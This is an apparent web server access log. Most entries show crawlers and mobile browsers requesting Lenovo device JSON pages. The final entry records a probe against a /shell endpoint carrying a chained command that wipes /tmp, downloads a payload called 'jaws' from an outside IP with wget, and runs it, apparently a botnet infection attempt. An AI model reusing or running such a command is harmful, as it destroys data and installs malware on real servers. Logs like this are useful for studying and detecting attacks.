162.159.108.69 - - [06/Jun/2026:03:46:03 +0800] "GET /lenovo/json/IDEAPAD-Z510-NOTEBOOK HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.64.213.9 - - [06/Jun/2026:03:47:18 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
172.71.24.45 - - [06/Jun/2026:03:48:51 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.68 - - [06/Jun/2026:04:20:52 +0800] "GET /index.php/lenovo/json/LEGION-5-PRO-16ACH6H/ HTTP/1.1" 200 2350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.68.119.7 - - [06/Jun/2026:05:24:18 +0800] "GET /index.php/lenovo/json/THINKEDGE-SE30/ HTTP/1.1" 200 1944 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.83 - - [06/Jun/2026:06:04:58 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.64.213.8 - - [06/Jun/2026:06:05:34 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.64.215.68 - - [06/Jun/2026:06:17:40 +0800] "GET /index.php/lenovo/json/EPC300/ HTTP/1.1" 200 1815 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.1167.1933 Mobile Safari/537.36"
172.64.215.69 - - [06/Jun/2026:06:19:44 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.5616.1203 Mobile Safari/537.36"
172.64.215.69 - - [06/Jun/2026:06:21:22 +0800] "GET /index.php/lenovo/json/LEGION-Y7000-2019/ HTTP/1.1" 200 2018 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.8316.1800 Mobile Safari/537.36"
138.121.121.144 - - [06/Jun/2026:06:31:18 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws; HTTP/1.1" 499 0 "-" "terrabot-owned-you"
